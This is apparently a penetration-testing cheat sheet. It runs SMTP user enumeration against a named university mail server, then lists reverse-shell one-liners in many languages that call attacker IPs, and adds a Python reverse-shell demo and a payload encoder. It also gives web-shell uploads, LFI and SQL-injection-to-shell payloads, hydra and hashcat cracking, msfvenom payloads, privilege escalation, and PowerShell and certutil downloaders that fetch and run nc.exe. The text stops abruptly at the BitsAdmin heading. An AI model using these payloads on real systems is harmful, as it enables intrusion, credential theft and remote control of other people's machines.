root@kali:~$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
root@kali:~$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
root@kali:~$ smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150

metasploit

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts.

msf auxiliary(scanner/smtp/smtp_enum) > set rhosts 202.38.193.203
rhosts => 202.38.193.203
msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 202.38.193.203:25 - 202.38.193.203:25 Banner: 220 mxt.scut.edu.cn ESMTP Postfix
[+] 202.38.193.203:25 - 202.38.193.203:25 Users found: adm, avahi, avahi-autoipd, bin, daemon, fax, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, news, nobody, operator, postgres, postmaster, root, sshd, sync, uucp, webmaster, www
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nmap script

nmap has the smtp-enum-users.nse script for the same purpose (it tries VRFY, EXPN and RCPT in turn):

$ nmap -p 25 --script smtp-enum-users.nse 202.38.193.203
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-24 10:23 CST
Nmap scan report for news.scut.edu.cn (202.38.193.203)
Host is up (0.054s latency).

PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test

Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds

Reference: http://www.lemurs.me/2018/08/23/smtp-user-enum/

Active Directory

# current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

# get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain

# get the DC the current session authenticated against
nltest /dsgetdc:offense.local

# get domain trusts from a cmd shell
nltest /domain_trusts

# get user info
nltest /user:"spotless"

# logon server of the current session (set prints every environment variable whose name starts with the given letters, here LOGONSERVER)
set l

# whoami on older Windows systems (USERNAME, USERDOMAIN, USERPROFILE)
set u

Gaining Access

Reverse shells

How a reverse shell works:

https://xz.aliyun.com/t/2548
https://xz.aliyun.com/t/2549

On the attacker's machine run nc -lvp 1234, then execute one of the following on the target (the attacker address and port are the ones in each line).
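The principle behind every one-liner in this section, as an added example that is not from the original post or the linked articles: the listener below stands in for nc -lvp, and the "victim" side does exactly what the python one-liner does with os.dup2, it connects out and then starts a shell whose stdin, stdout and stderr are the socket. It runs entirely on 127.0.0.1, uses /bin/sh, and the port is chosen by the OS so the demo does not collide with anything.

```python
import socket
import subprocess
import threading


def attacker(srv, results):
    """Attacker side, what `nc -lvp 1234` does: accept the victim's connection, write
    commands into it, read back whatever the shell prints until it exits."""
    conn, _ = srv.accept()
    conn.sendall(b"echo reverse-shell-works; exit\n")   # typed at the nc prompt in real life
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:          # the shell exited and closed its end
            break
        chunks.append(data)
    conn.close()
    results.append(b"".join(chunks))


def reverse_shell(host, port):
    """Victim side, the same thing the python/bash one-liners above do: connect out to the
    attacker (an outbound connection, which firewalls rarely block), then start a shell whose
    file descriptors 0, 1 and 2 are the socket, so commands flow in and output flows back."""
    s = socket.create_connection((host, port))
    fd = s.fileno()
    # Popen dup2()s the given descriptor onto stdin/stdout/stderr in the child; the
    # one-liners call os.dup2 themselves, with -i for an interactive prompt.
    p = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    s.close()  # the child keeps its own copies of the descriptor
    return p.wait()


def demo():
    """Wire both sides together over loopback; returns (shell exit status, captured output)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port for the demo
    srv.listen(1)
    port = srv.getsockname()[1]
    results = []
    t = threading.Thread(target=attacker, args=(srv, results))
    t.start()
    rc = reverse_shell("127.0.0.1", port)
    t.join()
    srv.close()
    return rc, results[0].decode()


if __name__ == "__main__":
    print(demo())
```

Everything after the connect is just descriptor plumbing, which is why the same trick works from bash (/dev/tcp plus exec redirections), perl, php or ruby: whatever language can open a TCP socket and hand its descriptor to a shell can produce a reverse shell.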

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5|while read line;do $line >&5 2>&1;done

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Nc

nc -e /bin/sh 192.168.146.129 2333
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.129 2333 >/tmp/f

URL-Encoded Perl: Linux

(The Perl one-liner above, wrapped in a command that writes it to /tmp/pew and runs it, percent-encoded so it can be passed in a URL parameter; attacker 10.11.0.245, port 443.)

echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew
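What that blob actually is, and how to build one for another listener, as an added example that is not part of the original post: the block keeps the page's encoded string and the page's Perl one-liner as constants, decodes the blob back into the plain command, and generates a fresh one with urllib.parse.quote for any host and port. The only assumption is the drop path /tmp/pew, taken from the page.

```python
from urllib.parse import quote, unquote

# The encoded one-liner exactly as it appears on the page (attacker 10.11.0.245, port 443).
PAGE_ENCODED = (
    "echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2C"
    "SOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2C"
    "inet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S"
    "%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27"
    "%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew"
)

# The Perl one-liner from the "Perl" section (the part inside perl -e '...').
PAGE_PERL_ONELINER = (
    'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
    'if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");'
    'open(STDERR,">&S");exec("/bin/sh -i");};'
)

PERL_TEMPLATE = (
    'use Socket;$i="{host}";$p={port};'
    'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
    'if(connect(S,sockaddr_in($p,inet_aton($i)))){{'
    'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
    'exec("/bin/sh -i");}};'
)


def perl_reverse_shell(host, port):
    """The page's Perl reverse shell with the listener address filled in."""
    return PERL_TEMPLATE.format(host=host, port=port)


def dropper_command(host, port, path="/tmp/pew"):
    """Shell command that writes the script to disk and runs it (what the page's blob decodes to)."""
    return f"echo '{perl_reverse_shell(host, port)}' > {path} && /usr/bin/perl {path}"


def url_encode_payload(cmd):
    """Percent-encode every character that is not unreserved (A-Z a-z 0-9 - _ . ~). Spaces,
    quotes, '/', '&', '=', '?', '#' and ';' would otherwise be parsed as URL or shell syntax,
    and an unencoded '+' would turn into a space on the server."""
    return quote(cmd, safe="")


def decode_payload(encoded):
    """Reverse of the above; handy for reading somebody else's blob before you run it."""
    return unquote(encoded)


if __name__ == "__main__":
    print(decode_payload(PAGE_ENCODED))
    print(url_encode_payload(dropper_command("10.0.0.1", 1234)))
```

Python emits upper-case hex digits while the page's blob mixes %2f and %3B; servers decode both the same way, so compare decoded strings rather than the encoded text.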

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat without -e #1

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Netcat without -e #2 (the attacker listens on both ports, 443 and 444, and replaces localhost with its own address: commands are read from the first connection, output comes back on the second)

nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444

Java (Groovy syntax)

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();

XTerm

One of the simplest forms of reverse shell is an xterm session. Run the following on the target; it tries to connect back to you (10.0.0.1) on TCP port 6001, which is X display :1.

xterm -display 10.0.0.1:1

To receive it, run an X server on your machine that listens on display :1 (TCP 6001); one way is Xnest:
Xnest :1
Then allow the target to connect to your X server:
xhost + targetip

JDWP remote command execution

Verification:

telnet to the port and type JDWP-Handshake; if the service answers with JDWP-Handshake it is a Java debug port with no authentication. Type quickly: the service drops the connection if the handshake does not arrive in time.

telnet TARGET_IP TARGET_PORT

Exploit script: https://github.com/IOActive/jdwp-shellifier

Usage:

python jdwp-shellifier.py -t TARGET_IP -p JDWP_PORT --cmd "Your Command"

For example, we can have the JVM run a reverse shell command.

Exploitation:

Start a listener on the attacker's host:

nc -lvvp 1234

Then run the script against the JDWP port (127.0.0.1:8000 in this example); the command string is executed on the host running the JVM:

python jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "ncat ATTACKER_IP 1234 -e /bin/bash"

(The original had the target run "ncat -lvvp 1234 -e /bin/bash", which is a bind shell on the target and cannot be received by the nc -lvvp listener above; with a listener the target has to connect out as shown. Also note that jdwp-shellifier only runs the command when the JVM hits the breakpoint it sets, by default in java.net.ServerSocket.accept, so send a request to the application if nothing happens.)

Remediation:

Close the JDWP port, or at the very least do not expose it to the internet
Disable Java debug mode (it also costs server performance)

References: https://www.bugbank.cn/pwn/detail/5750445bbcd7a4e777c3dcb2.html

https://blog.csdn.net/wanzt123/article/details/82793023

Working with Restricted Shells

# rare cases: a command given to ssh runs without the restricted login shell's startup, and nice can spawn an unrestricted shell
ssh bill@localhost ls -l /tmp
nice /bin/bash

Interactive TTY Shells

/usr/bin/expect sh

python -c 'import pty; pty.spawn("/bin/sh")'
# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk (Python 2 syntax)
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'

Using socat (a fully interactive TTY over TCP; the original had file:'tty' and a comma in the IP address, both of which fail)

#Listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim
socat exec:'bash -li',pty,stderr,setsid,sigint tcp:10.0.3.4:4444

Reference: https://www.anquanke.com/post/id/86444

File upload through a form

# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"

# POST binary data to web form
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v

PUT method (when the server accepts PUT for the web root, e.g. a misconfigured WebDAV)

curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php

Pattern generation and offset finding (buffer overflows: find which bytes of the input land in EIP)

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $EIP_VALUE

Bypassing File Upload

file.php -> file.jpg
file.php -> file.php.jpg
file.asp -> file.asp;.jpg
file.gif (contains php code, but starts with the string GIF87a/GIF89a)
file.php%00.jpg (null-byte truncation, older PHP/ASP only)
file.jpg with php backdoor in exif (see below)
.jpg -> proxy intercept -> rename to .php

Injecting code into an image

exiv2 -c '<?php system($_REQUEST["cmd"]); ?>' backdoor.jpeg
exiftool "-comment<=back.php" back.png

.htaccess trick (if you can upload a .htaccess file and Apache honours it, files with an arbitrary extension are run as PHP)

AddType application/x-httpd-php .blah

Password cracking

hydra

(-l single username, -L username file; -p single password, -P password file; -e ns additionally tries an empty password and the username as password; -f stop after the first hit; -vV verbose)

ssh:
hydra -l USER -P WORDLIST -t THREADS -vV -e ns IP ssh
hydra -l USER -P WORDLIST -t THREADS -o save.log -vV IP ssh

ftp:
hydra IP ftp -l USER -P WORDLIST -t THREADS(default 16) -vV
hydra IP ftp -l USER -P WORDLIST -e ns -vV

web login, GET:
hydra -l USER -P WORDLIST -t THREADS -vV -e ns IP http-get /admin/
hydra -l USER -P WORDLIST -t THREADS -vV -e ns -f IP http-get /admin/index.php

web login, POST:
hydra -l USER -P WORDLIST -s 80 IP http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(Parameters: -t 3 threads; -l admin the username; -P pass.txt the wordlist; -o out.txt output file; -f stop once a password is found; 10.36.16.18 the target; http-post-form means the login form is submitted by POST; the three colon-separated parts are the path, the form body with ^USER^/^PASS^ placeholders, and the string that appears in the response when the guess is wrong. Get that string right: it is the only thing hydra uses to tell failure from success, so a string that also appears on the success page makes every guess look wrong, and one that is missing from the failure page makes the first guess look right.)

https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

teamspeak:
hydra -l USER -P WORDLIST -s PORT -vV IP teamspeak

cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb

pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

rdp:
hydra ip rdp -l administrator -P pass.txt -V

http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

web brute-force
hydra 10.10.10.52 http-post-form -L /usr/share/wordlists/list "/endpoint/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list

other services (one service per run; the original wrote them as "ftp|ssh|smb://10.0.0.1")
hydra -l username -P /usr/share/wordlists/list ftp://10.10.10.52
hydra -l username -P /usr/share/wordlists/list ssh://10.10.10.52
hydra -l username -P /usr/share/wordlists/list smb://10.10.10.52

hashcat

# Brute-force from a mask: -a3 is mask attack, ?d = digit, ?u = upper-case letter; --stdout prints the candidates instead of cracking
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout

# Generate candidates from wordlist + mask (-a6, hybrid attack: each word followed by the mask; the original's "yourPassword|rockyou.txt" stands for either a single word or a wordlist file)
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" /usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout

# Generate a NetNTLMv2 hash with InternalMonologue (no LSASS access needed) and crack it with hashcat; the challenge is 8 bytes given as 16 hex digits (the original's "-challange 002233445566778888800" is malformed; the hash below embeds the challenge 1122334455667788 that was actually used)
InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -Challenge 1122334455667788
# resulting hash
spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000

# crack with hashcat (-m 5600 = NetNTLMv2; -a 0 = straight wordlist attack, the original's -a 3 would try to read rockyou.txt as a mask)
hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 0 /usr/share/wordlists/rockyou.txt --force --potfile-disable

msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

#LINUX
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

#WINDOWS
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

#MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

#PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

#JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

#WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

#PYTHON
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

#BASH
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

#PERL
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

#Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

#Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

#Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Compiling Code From Linux

# Windows (cross-compile with mingw; -lws2_32 links the Winsock library that socket code needs)
i686-w64-mingw32-gcc source.c -lws2_32 -o out.exe

# Linux (-m32 or -m64 to match the target's architecture)
gcc -m32|-m64 -o output source.c

Local file inclusion to shell (log poisoning)

nc 192.168.1.102 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close

# The request line lands verbatim in the web server's access log; including that log through the LFI then executes it:
# http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
# (send the request with nc rather than a browser or curl, which would URL-encode the PHP tags and break the payload)

Local file inclusion to arbitrary file read

file:///etc/passwd

http://example.com/index.php?page=php://input&cmd=ls
POST: <?php system($_GET['cmd']); ?>
http://192.168.2.237/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input   // php-cgi argument injection (CVE-2012-1823), only against a php-cgi that parses the query string as command-line options
POST: <?php system('uname -a');die(); ?>

expect://whoami   // only if the expect extension is loaded
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php   // read PHP source without executing it; base64-decode the response
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=id   // data:// needs allow_url_include=On
http://10.1.1.1/index.php?page=data://text/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E

# ZIP Wrapper (upload a zip renamed to .jpg, then include the file inside it)
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
http://example.com/index.php?page=zip://shell.jpg%23payload.php

# Loop through file descriptors
curl '' -H 'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d' --output -

Remote file shell: Windows + PHP

<?php system("powershell -Command \"& {(New-Object System.Net.WebClient).DownloadFile('http://10.11.0.245/netcat/nc.exe','nc.exe'); cmd /c nc.exe 10.11.0.245 4444 -e cmd.exe}\""); ?>

ps:
cmd /c dir        runs dir and then closes the command window.
cmd /k dir        runs dir and keeps the command window open.
cmd /c start dir  opens a new window and runs dir there; the original window closes.
cmd /k start dir  opens a new window and runs dir there; the original window stays open.

SQL injection

http://IP/less-1/index.php?id=2' and 1=2 union select 1,version(),@@basedir--+  // database version and install path

http://IP/less-1/index.php?id=2' and 1=2 union select 1,schema_name,3 from information_schema.schemata limit 3,1 --+  // enumerate database names --> the third database is named security

http://IP/less-1/index.php?id=2' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+  // enumerate table names in the current database

http://IP/less-1/index.php?id=2' and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='users' limit 1,1 --+  // enumerate column names of a table

http://IP/less-1/index.php?id=2' and 1=2 union select 1,username,password from security.users limit 1,1 --+  // dump both columns, returned in positions 2 and 3

http://ip/less-1/index.php?id=2' and 1=2 union select 1,load_file('d:/1.txt'),3 --+  // read a file

http://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj  // write a web shell

select @@basedir   // database install path
select @@datadir   // data directory
select version()   // database version
select user()      // current database user
select database()  // current database name

# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

# netcat reverse shell via mssql injection when xp_cmdshell is available
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

SQLite Injection to Shell or Backdoor

ATTACH DATABASE '/home/www/public_html/uploads/phpinfo.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES ('<?php system($_REQUEST[''cmd'']);?>');

MS-SQL Console

mssqlclient.py -port 27900 user:password@10.1.1.1
sqsh -S 10.1.1.1 -U user -P password

mssqlclient.py --> https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

Non-interactive shell

python -c 'import pty; pty.spawn("/bin/sh")'
/bin/busybox sh

Python code execution

__import__('os').system('id')

Local Enumeration & Privilege Escalation

https://github.com/sagishahar/lpeworkshop

ImmunityDebugger

Get Loaded Modules

# We're interested in modules without protection, Read & Execute permissions
!mona modules

Finding JMP ESP Address

!mona find -s "\xFF\xE4" -m moduleName

ZIP cracking

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt bank-account.zip

Options

USAGE: fcrackzip
[-b|--brute-force] use brute force algorithm (brute-force mode)
[-D|--dictionary] use a dictionary (dictionary mode)
[-B|--benchmark] execute a small benchmark (speed test)
[-c|--charset characterset] use characters from charset (character classes: digits, letters, mixed, ...)
[-h|--help] show this message
[--version] show the version of this program
[-V|--validate] sanity-check the algortihm
[-v|--verbose] be more verbose
[-p|--init-password string] use string as initial password/file (starting string; e.g. if you only remember that the password is six digits starting with 5, start from 5000000 to save time)
[-l|--length min-max] check password with length min to max (password length range)
[-u|--use-unzip] use unzip to weed out wrong passwords (this option is very important)
[-m|--method num] use method number "num" (see below) (cracking method)
[-2|--modulo r/m] only calculcate 1/m of the password
file... the zipfiles to crack

When the password length is unknown

fcrackzip -b -c1 -u test.zip  (-b selects brute-force mode; -c1 sets the charset to digits only, see the man page for other charsets; -u is essential, otherwise the recovered password is not displayed; -l 5-6 would restrict the length)

Reference: https://blog.csdn.net/u011500307/article/details/17371651

Setting up Simple HTTP server

# Linux
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:80

MySQL privilege escalation (UDF)

raptor_udf2.c and sid-shell.c or full tarball
# compile the object file first; the link line below expects raptor_udf2.o
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/raptor_udf2.so'));
select * from npn into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('chown root:root /tmp/sid-shell; chmod +s /tmp/sid-shell');

Reference: https://ejtaal.net/infosec/lordoftheroot/index.html

Docker privilege escalation

echo -e "FROM ubuntu:14.04\nENV WORKDIR /stuff\nRUN mkdir -p /stuff\nVOLUME [ /stuff ]\nWORKDIR /stuff" > Dockerfile && docker build -t my-docker-image . && docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' && ./sh -c id && ./sh

Reset the root password

echo "root:spotless" | chpasswd   // change the password non-interactively

Transferring files to the target

TFTP

#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start

# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file

FTP

# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve

# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt
ftp -s:ftp-commands.txt

# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd

CertUtil

Download:
certutil -urlcache -split -f bad.exe  // saved in the current directory under the same name as the downloaded file
certutil -urlcache -split -f bad.exe bad1.exe  // saved in the current directory under the given name
certutil -urlcache -f bad.exe  // cache directory: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

Delete the cached copy:
certutil -urlcache -f bad.exe delete

Reference: https://www.cnblogs.com/backlion/p/7325228.html

PHP

<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>

Python

python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"

HTTP: Powershell

powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); cmd /c nc.exe $ATTACKER 4444 -e cmd.exe}"
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -ArgumentList '$ATTACKER 4444 -e cmd.exe'}"
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -ArgumentList '$ATTACKER 4444 -e cmd.exe'"
powershell (New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/file.exe','file.exe');(New-Object -com Shell.Application).ShellExecute('file.exe');

# download using default proxy credentials and launch
powershell -Command "& { $b=New-Object System.Net.WebClient; $b.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $b.DownloadString('http://$ATTACKER/nc.exe') | Out-File nc.exe; Start-Process nc.exe -NoNewWindow -ArgumentList '$ATTACKER 4444 -e cmd.exe' }"

HTTP: VBScript

cscript wget.vbs http://$ATTACKER/file.exe localfile.exe

HTTP: Linux

wget http://$ATTACKER/file
curl http://$ATTACKER/file -O
scp ~/file/file.bin user@$TARGET:tmp/backdoor.py

Netcat

# Attacker
nc -l -p 4444 < /tool/file.exe

# Victim
nc $ATTACKER 4444 > file.exe

HTTP: Windows “debug.exe” Method

# 1. In Linux, convert binary to hex ascii:
wine /usr/share/windows-binaries/exe2bat.exe /root/tools/netcat/nc.exe nc.txt
# 2. Paste nc.txt into Windows Shell.

HTTP: Windows BitsAdmin

